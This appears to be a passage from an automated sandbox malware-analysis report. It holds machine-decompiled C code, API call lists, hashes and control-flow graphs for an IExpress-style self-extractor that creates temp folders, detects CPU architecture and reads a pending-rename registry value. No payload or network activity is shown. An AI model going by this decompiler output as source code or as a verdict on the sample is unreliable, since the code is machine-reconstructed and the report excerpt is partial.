                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 010645A3
                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 010645E3
                                                • LocalAlloc.KERNEL32(00000040,00000002), ref: 0106460D
                                                • MessageBeep.USER32(00000000), ref: 01064630
                                                • MessageBoxA.USER32(?,00000000,lega,00000000), ref: 01064666
                                                • LocalFree.KERNEL32(00000000), ref: 0106466F
                                                  • Part of subcall function 0106681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0106686E
                                                  • Part of subcall function 0106681F: GetSystemMetrics.USER32(0000004A), ref: 010668A7
                                                  • Part of subcall function 0106681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010668CC
                                                  • Part of subcall function 0106681F: RegQueryValueExA.ADVAPI32(?,01061140,00000000,?,?,0000000C), ref: 010668F4
                                                  • Part of subcall function 0106681F: RegCloseKey.ADVAPI32(?), ref: 01066902
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                • String ID: LoadString() Error. Could not load string resource.$lega
                                                • API String ID: 3244514340-2134167237
                                                • Opcode ID: f5ecd8c38a3572379263b181c0d02a74d4c5cdae4ea5607ccd995cd06733b0aa
                                                • Instruction ID: e99ccce084810f1d4bed106a2cb9072cef635da3de61d8d2876f75c393e2fb03
                                                • Opcode Fuzzy Hash: f5ecd8c38a3572379263b181c0d02a74d4c5cdae4ea5607ccd995cd06733b0aa
                                                • Instruction Fuzzy Hash: 5451D671900216EFDB21AE28CC48BAA7BADEF85304F044195FD89F7245DB369D05CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 95%
                                                			E010653A1(CHAR* __ecx, CHAR* __edx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t5;
                                                				long _t13;
                                                				int _t14;
                                                				CHAR* _t20;
                                                				int _t29;
                                                				int _t30;
                                                				CHAR* _t32;
                                                				signed int _t33;
                                                				void* _t34;
                                                
                                                				_t5 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t5 ^ _t33;
                                                				_t32 = __edx;
                                                				_t20 = __ecx;
                                                				_t29 = 0;
                                                				while(1) {
                                                					E0106171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                					_t34 = _t34 + 0x10;
                                                					_t29 = _t29 + 1;
                                                					E01061680(_t32, 0x104, _t20);
                                                					E0106658A(_t32, 0x104,  &_v268); // executed
                                                					RemoveDirectoryA(_t32); // executed
                                                					_t13 = GetFileAttributesA(_t32); // executed
                                                					if(_t13 == 0xffffffff) {
                                                						break;
                                                					}
                                                					if(_t29 < 0x190) {
                                                						continue;
                                                					}
                                                					L3:
                                                					_t30 = 0;
                                                					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                						_t30 = 1;
                                                						DeleteFileA(_t32);
                                                						CreateDirectoryA(_t32, 0);
                                                					}
                                                					L5:
                                                					return E01066CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                				}
                                                				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                				if(_t14 == 0) {
                                                					goto L3;
                                                				}
                                                				_t30 = 1;
                                                				 *0x1068a20 = 1;
                                                				goto L5;
                                                			}

















                                                0x010653ac
                                                0x010653b3
                                                0x010653b9
                                                0x010653bb
                                                0x010653bd
                                                0x010653bf
                                                0x010653d1
                                                0x010653d6
                                                0x010653e0
                                                0x010653e2
                                                0x010653f5
                                                0x010653fb
                                                0x01065402
                                                0x0106540b
                                                0x00000000
                                                0x00000000
                                                0x01065413
                                                0x00000000
                                                0x00000000
                                                0x01065415
                                                0x01065416
                                                0x01065427
                                                0x0106542a
                                                0x0106542b
                                                0x01065434
                                                0x01065434
                                                0x0106543a
                                                0x0106544c
                                                0x0106544c
                                                0x01065452
                                                0x0106545a
                                                0x00000000
                                                0x00000000
                                                0x0106545e
                                                0x0106545f
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 0106171E: _vsnprintf.MSVCRT ref: 01061750
                                                • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010653FB
                                                • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01065402
                                                • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106541F
                                                • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106542B
                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01065434
                                                • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01065452
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                • API String ID: 1082909758-2310010875
                                                • Opcode ID: 24a2dcc45f7fd2efc1198b6bc479a560e2c42e2da66aa21fce2e28f3b44b595f
                                                • Instruction ID: 41fa63fa4a19d62ece21a5c87962d8b8198a3c756efa9516651f078eff16c519
                                                • Opcode Fuzzy Hash: 24a2dcc45f7fd2efc1198b6bc479a560e2c42e2da66aa21fce2e28f3b44b595f
                                                • Instruction Fuzzy Hash: 83110171700214B7E730AB269C48FEF3AADEFD5721F004069F6C6E3190CE7A894287A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 522 1065467-1065484 523 106551c-1065528 call 1061680 522->523 524 106548a-1065490 call 10653a1 522->524 527 106552d-1065539 call 10658c8 523->527 528 1065495-1065497 524->528 537 106554d-1065552 527->537 538 106553b-1065545 CreateDirectoryA 527->538 530 1065581-1065583 528->530 531 106549d-10654c0 call 1061781 528->531 533 106558d-106559d call 1066ce0 530->533 539 10654c2-10654d8 GetSystemInfo 531->539 540 106550c-106551a call 106658a 531->540 544 1065554-1065557 call 106597d 537->544 545 1065585-106558b 537->545 542 1065577-106557c call 1066285 538->542 543 1065547 538->543 546 10654fe 539->546 547 10654da-10654dd 539->547 540->527 542->530 543->537 553 106555c-106555e 544->553 545->533 554 1065503-1065507 call 106658a 546->554 551 10654f7-10654fc 547->551 552 10654df-10654e2 547->552 551->554 557 10654e4-10654e7 552->557 558 10654f0-10654f5 552->558 553->545 559 1065560-1065566 553->559 554->540 557->540 561 10654e9-10654ee 557->561 558->554 559->530 562 1065568-1065575 RemoveDirectoryA 559->562 561->554 562->530
                                                C-Code - Quality: 75%
                                                			E01065467(CHAR* __ecx, void* __edx, char* _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				struct _SYSTEM_INFO _v304;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t10;
                                                				void* _t13;
                                                				intOrPtr _t14;
                                                				void* _t16;
                                                				void* _t20;
                                                				signed int _t26;
                                                				void* _t28;
                                                				void* _t29;
                                                				CHAR* _t48;
                                                				signed int _t49;
                                                				intOrPtr _t61;
                                                
                                                				_t10 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t10 ^ _t49;
                                                				_push(__ecx);
                                                				if(__edx == 0) {
                                                					_t48 = 0x10691e4;
                                                					_t42 = 0x104;
                                                					E01061680(0x10691e4, 0x104);
                                                					L14:
                                                					_t13 = E010658C8(_t48); // executed
                                                					if(_t13 != 0) {
                                                						L17:
                                                						_t42 = _a4;
                                                						if(_a4 == 0) {
                                                							L23:
                                                							 *0x1069124 = 0;
                                                							_t14 = 1;
                                                							L24:
                                                							return E01066CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                						}
                                                						_t16 = E0106597D(_t48, _t42, 1, 0); // executed
                                                						if(_t16 != 0) {
                                                							goto L23;
                                                						}
                                                						_t61 =  *0x1068a20; // 0x0
                                                						if(_t61 != 0) {
                                                							 *0x1068a20 = 0;
                                                							RemoveDirectoryA(_t48);
                                                						}
                                                						L22:
                                                						_t14 = 0;
                                                						goto L24;
                                                					}
                                                					if(CreateDirectoryA(_t48, 0) == 0) {
                                                						 *0x1069124 = E01066285();
                                                						goto L22;
                                                					}
                                                					 *0x1068a20 = 1;
                                                					goto L17;
                                                				}
                                                				_t42 =  &_v268;
                                                				_t20 = E010653A1(__ecx,  &_v268); // executed
                                                				if(_t20 == 0) {
                                                					goto L22;
                                                				}
                                                				_push(__ecx);
                                                				_t48 = 0x10691e4;
                                                				E01061781(0x10691e4, 0x104, __ecx,  &_v268);
                                                				if(( *0x1069a34 & 0x00000020) == 0) {
                                                					L12:
                                                					_t42 = 0x104;
                                                					E0106658A(_t48, 0x104, 0x1061140);
                                                					goto L14;
                                                				}
                                                				GetSystemInfo( &_v304);
                                                				_t26 = _v304.dwOemId & 0x0000ffff;
                                                				if(_t26 == 0) {
                                                					_push("i386");
                                                					L11:
                                                					E0106658A(_t48, 0x104);
                                                					goto L12;
                                                				}
                                                				_t28 = _t26 - 1;
                                                				if(_t28 == 0) {
                                                					_push("mips");
                                                					goto L11;
                                                				}
                                                				_t29 = _t28 - 1;
                                                				if(_t29 == 0) {
                                                					_push("alpha");
                                                					goto L11;
                                                				}
                                                				if(_t29 != 1) {
                                                					goto L12;
                                                				}
                                                				_push("ppc");
                                                				goto L11;
                                                			}




















                                                0x01065472
                                                0x01065479
                                                0x01065481
                                                0x01065484
                                                0x0106551c
                                                0x01065521
                                                0x01065528
                                                0x0106552d
                                                0x0106552f
                                                0x01065539
                                                0x0106554d
                                                0x0106554d
                                                0x01065552
                                                0x01065585
                                                0x01065585
                                                0x0106558b
                                                0x0106558d
                                                0x0106559d
                                                0x0106559d
                                                0x01065557
                                                0x0106555e
                                                0x00000000
                                                0x00000000
                                                0x01065560
                                                0x01065566
                                                0x01065569
                                                0x0106556f
                                                0x0106556f
                                                0x01065581
                                                0x01065581
                                                0x00000000
                                                0x01065581
                                                0x01065545
                                                0x0106557c
                                                0x00000000
                                                0x0106557c
                                                0x01065547
                                                0x00000000
                                                0x01065547
                                                0x0106548a
                                                0x01065490
                                                0x01065497
                                                0x00000000
                                                0x00000000
                                                0x0106549d
                                                0x010654ab
                                                0x010654b4
                                                0x010654c0
                                                0x0106550c
                                                0x01065511
                                                0x01065515
                                                0x00000000
                                                0x01065515
                                                0x010654c9
                                                0x010654d6
                                                0x010654d8
                                                0x010654fe
                                                0x01065503
                                                0x01065507
                                                0x00000000
                                                0x01065507
                                                0x010654da
                                                0x010654dd
                                                0x010654f7
                                                0x00000000
                                                0x010654f7
                                                0x010654df
                                                0x010654e2
                                                0x010654f0
                                                0x00000000
                                                0x010654f0
                                                0x010654e7
                                                0x00000000
                                                0x00000000
                                                0x010654e9
                                                0x00000000

                                                APIs
                                                • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010654C9
                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106553D
                                                • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106556F
                                                  • Part of subcall function 010653A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010653FB
                                                  • Part of subcall function 010653A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01065402
                                                  • Part of subcall function 010653A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106541F
                                                  • Part of subcall function 010653A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106542B
                                                  • Part of subcall function 010653A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01065434
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                • API String ID: 1979080616-1000730752
                                                • Opcode ID: 0c566fbc18cefbc0a8d9f4e6882a2f548f52b81e3e2fb3df6c3be422d6211262
                                                • Instruction ID: 3b93d4e3a4bf948c24e877a7e95e3a30e2d582771a1cef813270adb2ac433c74
                                                • Opcode Fuzzy Hash: 0c566fbc18cefbc0a8d9f4e6882a2f548f52b81e3e2fb3df6c3be422d6211262
                                                • Instruction Fuzzy Hash: 20313B70B002259BDB60AF2D9C689BE77DFABD12C4B0441AEE9C2D7544DB76CF018790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 563 106256d-106257d 564 1062622-1062627 call 10624e0 563->564 565 1062583-1062589 563->565 573 1062629-106262f 564->573 567 106258b 565->567 568 10625e8-1062607 RegOpenKeyExA 565->568 572 1062591-1062595 567->572 567->573 569 10625e3-10625e6 568->569 570 1062609-1062620 RegQueryInfoKeyA 568->570 569->573 575 10625d1-10625dd RegCloseKey 570->575 572->573 574 106259b-10625ba RegOpenKeyExA 572->574 574->569 576 10625bc-10625cb RegQueryValueExA 574->576 575->569 576->575
                                                C-Code - Quality: 86%
                                                			E0106256D(signed int __ecx) {
                                                				int _v8;
                                                				void* _v12;
                                                				signed int _t13;
                                                				signed int _t19;
                                                				long _t24;
                                                				void* _t26;
                                                				int _t31;
                                                				void* _t34;
                                                
                                                				_push(__ecx);
                                                				_push(__ecx);
                                                				_t13 = __ecx & 0x0000ffff;
                                                				_t31 = 0;
                                                				if(_t13 == 0) {
                                                					_t31 = E010624E0(_t26);
                                                				} else {
                                                					_t34 = _t13 - 1;
                                                					if(_t34 == 0) {
                                                						_v8 = 0;
                                                						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                							goto L7;
                                                						} else {
                                                							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                							goto L6;
                                                						}
                                                						L12:
                                                					} else {
                                                						if(_t34 > 0 && __ecx <= 3) {
                                                							_v8 = 0;
                                                							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                							if(_t24 == 0) {
                                                								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                								L6:
                                                								asm("sbb eax, eax");
                                                								_v8 = _v8 &  !( ~_t19);
                                                								RegCloseKey(_v12); // executed
                                                							}
                                                							L7:
                                                							_t31 = _v8;
                                                						}
                                                					}
                                                				}
                                                				return _t31;
                                                				goto L12;
                                                			}











                                                0x01062572
                                                0x01062573
                                                0x01062575
                                                0x01062578
                                                0x0106257d
                                                0x01062627
                                                0x01062583
                                                0x01062586
                                                0x01062589
                                                0x010625eb
                                                0x01062607
                                                0x00000000
                                                0x01062609
                                                0x0106261a
                                                0x00000000
                                                0x0106261a
                                                0x00000000
                                                0x0106258b
                                                0x0106258b
                                                0x0106259e
                                                0x010625b2
                                                0x010625ba
                                                0x010625cb
                                                0x010625d1
                                                0x010625d6
                                                0x010625da
                                                0x010625dd
                                                0x010625dd
                                                0x010625e3
                                                0x010625e3
                                                0x010625e3
                                                0x0106258b
                                                0x01062589
                                                0x0106262f
                                                0x00000000

                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,01064096,01064096,?,01061ED3,00000001,00000000,?,?,01064137,?), ref: 010625B2
                                                • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,01064096,?,01061ED3,00000001,00000000,?,?,01064137,?,01064096), ref: 010625CB
                                                • RegCloseKey.KERNELBASE(?,?,01061ED3,00000001,00000000,?,?,01064137,?,01064096), ref: 010625DD
                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,01064096,01064096,?,01061ED3,00000001,00000000,?,?,01064137,?), ref: 010625FF
                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,01064096,00000000,00000000,00000000,00000000,?,01061ED3,00000001,00000000), ref: 0106261A
                                                Strings
                                                • System\CurrentControlSet\Control\Session Manager, xrefs: 010625A8
                                                • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010625F5
                                                • PendingFileRenameOperations, xrefs: 010625C3
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: OpenQuery$CloseInfoValue
                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                • API String ID: 2209512893-559176071
                                                • Opcode ID: 3ccbba3c5a65ad8f30c23f6ba2239a262554f7b7d15b40120911fb4004212b87
                                                • Instruction ID: deb197b4572e57acda86905ad8b5709149436beb9f86c2f6d2a65283d1641a23
                                                • Opcode Fuzzy Hash: 3ccbba3c5a65ad8f30c23f6ba2239a262554f7b7d15b40120911fb4004212b87
                                                • Instruction Fuzzy Hash: 49113D35A42228FBAB309A969C09DFBBEBCEF056A1F104095F989A2010D6355B44D7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 577 1066a60-1066a91 call 1067155 call 1067208 GetStartupInfoW 583 1066a93-1066aa2 577->583 584 1066aa4-1066aa6 583->584 585 1066abc-1066abe 583->585 586 1066aaf-1066aba Sleep 584->586 587 1066aa8-1066aad 584->587 588 1066abf-1066ac5 585->588 586->583 587->588 589 1066ac7-1066acf _amsg_exit 588->589 590 1066ad1-1066ad7 588->590 591 1066b0b-1066b11 589->591 592 1066b05 590->592 593 1066ad9-1066ae9 call 1066c3f 590->593 594 1066b13-1066b24 _initterm 591->594 595 1066b2e-1066b30 591->595 592->591 599 1066aee-1066af2 593->599 594->595 597 1066b32-1066b39 595->597 598 1066b3b-1066b42 595->598 597->598 600 1066b67-1066b71 598->600 601 1066b44-1066b51 call 1067060 598->601 599->591 602 1066af4-1066b00 599->602 604 1066b74-1066b79 600->604 601->600 611 1066b53-1066b65 601->611 605 1066c39-1066c3e call 106724d 602->605 608 1066bc5-1066bc8 604->608 609 1066b7b-1066b7d 604->609 612 1066bd6-1066be3 _ismbblead 608->612 613 1066bca-1066bd3 608->613 614 1066b94-1066b98 609->614 615 1066b7f-1066b81 609->615 611->600 618 1066be5-1066be6 612->618 619 1066be9-1066bed 612->619 613->612 616 1066ba0-1066ba2 614->616 617 1066b9a-1066b9e 614->617 615->608 620 1066b83-1066b85 615->620 622 1066ba3-1066bbc call 1062bfb 616->622 617->622 618->619 619->604 624 1066c1e-1066c25 619->624 620->614 621 1066b87-1066b8a 620->621 621->614 625 1066b8c-1066b92 621->625 622->624 630 1066bbe-1066bbf exit 622->630 626 1066c27-1066c2d _cexit 624->626 627 1066c32 624->627 625->620 626->627 627->605 630->608
                                                C-Code - Quality: 51%
                                                			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                				signed int* _t25;
                                                				signed int _t26;
                                                				signed int _t29;
                                                				int _t30;
                                                				signed int _t37;
                                                				signed char _t41;
                                                				signed int _t53;
                                                				signed int _t54;
                                                				intOrPtr _t56;
                                                				signed int _t58;
                                                				signed int _t59;
                                                				intOrPtr* _t60;
                                                				void* _t62;
                                                				void* _t67;
                                                				void* _t68;
                                                
                                                				E01067155();
                                                				_push(0x58);
                                                				_push(0x10672b8);
                                                				E01067208(__ebx, __edi, __esi);
                                                				 *(_t62 - 0x20) = 0;
                                                				GetStartupInfoW(_t62 - 0x68);
                                                				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                				_t53 = 0;
                                                				while(1) {
                                                					asm("lock cmpxchg [edx], ecx");
                                                					if(0 == 0) {
                                                						break;
                                                					}
                                                					if(0 != _t56) {
                                                						Sleep(0x3e8);
                                                						continue;
                                                					} else {
                                                						_t58 = 1;
                                                						_t53 = 1;
                                                					}
                                                					L7:
                                                					_t67 =  *0x10688b0 - _t58; // 0x2
                                                					if(_t67 != 0) {
                                                						__eflags =  *0x10688b0; // 0x2
                                                						if(__eflags != 0) {
                                                							 *0x10681e4 = _t58;
                                                							goto L13;
                                                						} else {
                                                							 *0x10688b0 = _t58;
                                                							_t37 = E01066C3F(0x10610b8, 0x10610c4); // executed
                                                							__eflags = _t37;
                                                							if(__eflags == 0) {
                                                								goto L13;
                                                							} else {
                                                								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                								_t30 = 0xff;
                                                							}
                                                						}
                                                					} else {
                                                						_push(0x1f);
                                                						L01066FF4();
                                                						L13:
                                                						_t68 =  *0x10688b0 - _t58; // 0x2
                                                						if(_t68 == 0) {
                                                							_push(0x10610b4);
                                                							_push(0x10610ac);
                                                							L01067202();
                                                							 *0x10688b0 = 2;
                                                						}
                                                						if(_t53 == 0) {
                                                							 *0x10688ac = 0;
                                                						}
                                                						_t71 =  *0x10688b4;
                                                						if( *0x10688b4 != 0 && E01067060(_t71, 0x10688b4) != 0) {
                                                							_t60 =  *0x10688b4; // 0x0
                                                							 *0x106a288(0, 2, 0);
                                                							 *_t60();
                                                						}
                                                						_t25 = __imp___acmdln; // 0x76665b9c
                                                						_t59 =  *_t25;
                                                						 *(_t62 - 0x1c) = _t59;
                                                						_t54 =  *(_t62 - 0x20);
                                                						while(1) {
                                                							_t41 =  *_t59;
                                                							if(_t41 > 0x20) {
                                                								goto L32;
                                                							}
                                                							if(_t41 != 0) {
                                                								if(_t54 != 0) {
                                                									goto L32;
                                                								} else {
                                                									while(_t41 != 0 && _t41 <= 0x20) {
                                                										_t59 = _t59 + 1;
                                                										 *(_t62 - 0x1c) = _t59;
                                                										_t41 =  *_t59;
                                                									}
                                                								}
                                                							}
                                                							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                								_t29 = 0xa;
                                                							} else {
                                                								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                							}
                                                							_push(_t29);
                                                							_t30 = E01062BFB(0x1060000, 0, _t59); // executed
                                                							 *0x10681e0 = _t30;
                                                							__eflags =  *0x10681f8;
                                                							if( *0x10681f8 == 0) {
                                                								exit(_t30); // executed
                                                								goto L32;
                                                							}
                                                							__eflags =  *0x10681e4;
                                                							if( *0x10681e4 == 0) {
                                                								__imp___cexit();
                                                								_t30 =  *0x10681e0; // 0x80070002
                                                							}
                                                							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                							goto L40;
                                                							L32:
                                                							__eflags = _t41 - 0x22;
                                                							if(_t41 == 0x22) {
                                                								__eflags = _t54;
                                                								_t15 = _t54 == 0;
                                                								__eflags = _t15;
                                                								_t54 = 0 | _t15;
                                                								 *(_t62 - 0x20) = _t54;
                                                							}
                                                							_t26 = _t41 & 0x000000ff;
                                                							__imp___ismbblead(_t26);
                                                							__eflags = _t26;
                                                							if(_t26 != 0) {
                                                								_t59 = _t59 + 1;
                                                								__eflags = _t59;
                                                								 *(_t62 - 0x1c) = _t59;
                                                							}
                                                							_t59 = _t59 + 1;
                                                							 *(_t62 - 0x1c) = _t59;
                                                						}
                                                					}
                                                					L40:
                                                					return E0106724D(_t30);
                                                				}
                                                				_t58 = 1;
                                                				__eflags = 1;
                                                				goto L7;
                                                			}


















                                                0x01066a60
                                                0x01066a6a
                                                0x01066a6c
                                                0x01066a71
                                                0x01066a78
                                                0x01066a7f
                                                0x01066a85
                                                0x01066a8e
                                                0x01066a91
                                                0x01066a93
                                                0x01066a9c
                                                0x01066aa2
                                                0x00000000
                                                0x00000000
                                                0x01066aa6
                                                0x01066ab4
                                                0x00000000
                                                0x01066aa8
                                                0x01066aaa
                                                0x01066aab
                                                0x01066aab
                                                0x01066abf
                                                0x01066abf
                                                0x01066ac5
                                                0x01066ad1
                                                0x01066ad7
                                                0x01066b05
                                                0x00000000
                                                0x01066ad9
                                                0x01066ad9
                                                0x01066ae9
                                                0x01066af0
                                                0x01066af2
                                                0x00000000
                                                0x01066af4
                                                0x01066af4
                                                0x01066afb
                                                0x01066afb
                                                0x01066af2
                                                0x01066ac7
                                                0x01066ac7
                                                0x01066ac9
                                                0x01066b0b
                                                0x01066b0b
                                                0x01066b11
                                                0x01066b13
                                                0x01066b18
                                                0x01066b1d
                                                0x01066b24
                                                0x01066b24
                                                0x01066b30
                                                0x01066b39
                                                0x01066b39
                                                0x01066b3b
                                                0x01066b42
                                                0x01066b57
                                                0x01066b5f
                                                0x01066b65
                                                0x01066b65
                                                0x01066b67
                                                0x01066b6c
                                                0x01066b6e
                                                0x01066b71
                                                0x01066b74
                                                0x01066b74
                                                0x01066b79
                                                0x00000000
                                                0x00000000
                                                0x01066b7d
                                                0x01066b81
                                                0x00000000
                                                0x00000000
                                                0x01066b83
                                                0x01066b8c
                                                0x01066b8d
                                                0x01066b90
                                                0x01066b90
                                                0x01066b83
                                                0x01066b81
                                                0x01066b94
                                                0x01066b98
                                                0x01066ba2
                                                0x01066b9a
                                                0x01066b9a
                                                0x01066b9a
                                                0x01066ba3
                                                0x01066bab
                                                0x01066bb0
                                                0x01066bb5
                                                0x01066bbc
                                                0x01066bbf
                                                0x00000000
                                                0x01066bbf
                                                0x01066c1e
                                                0x01066c25
                                                0x01066c27
                                                0x01066c2d
                                                0x01066c2d
                                                0x01066c32
                                                0x00000000
                                                0x01066bc5
                                                0x01066bc5
                                                0x01066bc8
                                                0x01066bcc
                                                0x01066bce
                                                0x01066bce
                                                0x01066bd1
                                                0x01066bd3
                                                0x01066bd3
                                                0x01066bd6
                                                0x01066bda
